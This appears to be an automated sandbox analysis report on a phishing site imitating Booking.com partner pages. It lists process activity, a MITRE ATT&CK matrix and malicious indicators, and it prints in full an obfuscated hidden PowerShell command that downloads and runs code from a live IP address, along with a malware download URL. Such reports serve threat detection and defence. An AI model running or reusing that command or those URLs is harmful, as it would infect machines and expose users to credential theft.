                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1630000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3150000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2F80000 memory reserve | memory write watch
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\mshta.exeWindow / User API: threadDelayed 547
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7976
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1893
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 393
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4291
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\toaudqqy.dllJump to dropped file
                Source: C:\Windows\System32\svchost.exe TID: 7024Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\mshta.exe TID: 8040Thread sleep count: 547 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep count: 7976 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep count: 1893 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5704Thread sleep time: -10145709240540247s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6252Thread sleep count: 393 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 772Thread sleep count: 323 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6252Thread sleep count: 4291 > 30
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 410000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 412000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FEF008
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES189A.tmp" "c:\Users\user\AppData\Local\Temp\CSC8B1832D39C30407296B9DAA42FAFADD.TMP"
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
                Windows Management Instrumentation                		2
                Browser Extensions                		211
                Process Injection                		11
                Masquerading                		OS Credential Dumping3
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		LSASS Memory1
                Process Discovery                		Remote Desktop ProtocolData from Removable Media13
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Extra Window Memory Injection                		51
                Virtualization/Sandbox Evasion                		Security Account Manager51
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook211
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture15
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                File Deletion                		Cached Domain Credentials34
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Extra Window Memory Injection                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Screenshots

                Download Video

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                http://roombedsrewiews.com0%Avira URL Cloudsafe

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\toaudqqy.dll100%AviraTR/Dropper.Gen7

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://roombedsrewiews.com/0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/ls.unveilhooks.min.js0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/themes/custom/booking/fonts/icons/icons.woff?v=1.3.30%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/optimize.js0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/asset_332_350x180px.png.png0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/71cd12cdf77ebcb750cff91a9bba6f04.js0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/otSDKStub.js0%Avira URL Cloudsafe
                https://partner.booking.com/themes/custom/booking/images/favicons/favicon.ico0%Avira URL Cloudsafe
                https://partner.booking.com/themes/custom/booking/fonts/icons/icons.woff?v=1.3.30%Avira URL Cloudsafe
                https://siteintercept.qualtrics.com/dxjsmodule/8.7128e66c4069227926d7.chunk.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=booking.roombedsrewiews.com0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/938_afde72b9aaa8302ff017.css0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/826_0d1737e180931a217647.css0%Avira URL Cloudsafe
                https://siteintercept.qualtrics.com/WRSiteInterceptEngine/Targeting.php?Q_ZoneID=ZN_3Eum1ldyL0aIh0i&Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/otSDKStub.js/consent/5b5ab62b-24f1-40fe-8bb1-6de0b3a94fda/5b5ab62b-24f1-40fe-8bb1-6de0b3a94fda.json0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/evergage.min.js0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/lazysizes.min.js0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/a0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/OtAutoBlock.js0%Avira URL Cloudsafe
                https://partner.booking.com/themes/custom/booking/images/favicons/favicon.svg0%Avira URL Cloudsafe
                https://partner.booking.com/themes/custom/booking/images/favicons/site.webmanifest0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/css_H7dPp81WTvvS--0HVXMJ9Hozig2DMTF7X1aURkZvL00.css0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/message_tip.svg0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/45_1975cbc2f7eaad75f590.css0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/munchkin.js0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/otBannerSdk.js0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/themes/custom/booking/fonts/icons/icons.ttf?v=1.3.30%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/css_3iFMQAIstg4teIom2wVaOik81XAQ5V-7tH-iz2mq5to.css0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/css_399BM-E_9aHp94scPSljMDjXwz84BMBa3y-GIQG8XYY.css0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/static/message_alert.svg0%Avira URL Cloudsafe
                http://roombedsrewiews.com/0%Avira URL Cloudsafe
                https://siteintercept.qualtrics.com/dxjsmodule/1.63482081f3bf73c57075.chunk.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=partnersatbooking0%Avira URL Cloudsafe
                https://siteintercept.qualtrics.com/dxjsmodule/CoreModule.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=partnersatbooking0%Avira URL Cloudsafe
                https://booking.roombedsrewiews.com/api?c=10%Avira URL Cloudsafe
                https://siteintercept.qualtrics.com/dxjsmodule/5.76657644fe1b73dc4306.chunk.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=partnersatbooking0%Avira URL Cloudsafe
                http://92.255.85.2/j.exe0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                261-nrz-371.mktoresp.com
                		134.213.193.62
                		truefalse
                  		unknown
                  a.nel.cloudflare.com
                  		35.190.80.1
                  		truefalse
                    		high
                    code.jquery.com
                    		151.101.66.137
                    		truefalse
                      		high
                      adult-hub1990.cfd
                      		172.64.80.1
                      		truetrue
                        		unknown
                        prodlb.siteintercept.qualtrics.com.cdn.cloudflare.net
                        		104.17.208.240
                        		truefalse
                          		high
                          roombedsrewiews.com
                          		172.67.207.52
                          		truetrue
                            		unknown
                            booking.roombedsrewiews.com
                            		104.21.61.69
                            		truetrue
                              		unknown
                              www.google.com
                              		142.250.64.68
                              		truefalse
                                		high
                                partner.booking.com
                                		18.164.96.110
                                		truefalse
                                  		unknown
                                  ip-api.com
                                  		208.95.112.1
                                  		truefalse
                                    		high
                                    e10776.b.akamaiedge.net
                                    		23.204.6.193
                                    		truefalse
                                      		high
                                      siteintercept.qualtrics.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        munchkin.marketo.net
                                        		unknown
                                        		unknownfalse
                                          		high
                                          zn3eum1ldyl0aih0i-partnersatbooking.siteintercept.qualtrics.com
                                          		unknown
                                          		unknownfalse
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            https://otelrules.svc.static.microsoft/rules/rule701151v1s19.xmlfalse
                                              		high
                                              https://otelrules.svc.static.microsoft/rules/rule704001v0s19.xmlfalse
                                                		high
                                                https://otelrules.svc.static.microsoft/rules/rule702151v1s19.xmlfalse
                                                  		high
                                                  https://otelrules.svc.static.microsoft/rules/rule700151v1s19.xmlfalse
                                                    		high
                                                    https://otelrules.svc.static.microsoft/rules/rule703151v1s19.xmlfalse
                                                      		high
                                                      https://otelrules.svc.static.microsoft/rules/rule120630v0s19.xmlfalse
                                                        		high
                                                        https://otelrules.svc.static.microsoft/rules/rule120645v0s19.xmlfalse
                                                          		high
                                                          https://siteintercept.qualtrics.com/dxjsmodule/1.63482081f3bf73c57075.chunk.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=partnersatbookingfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://siteintercept.qualtrics.com/dxjsmodule/CoreModule.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=partnersatbookingfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://otelrules.svc.static.microsoft/rules/rule700001v2s19.xmlfalse
                                                            		high
                                                            http://92.255.85.2/j.exetrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
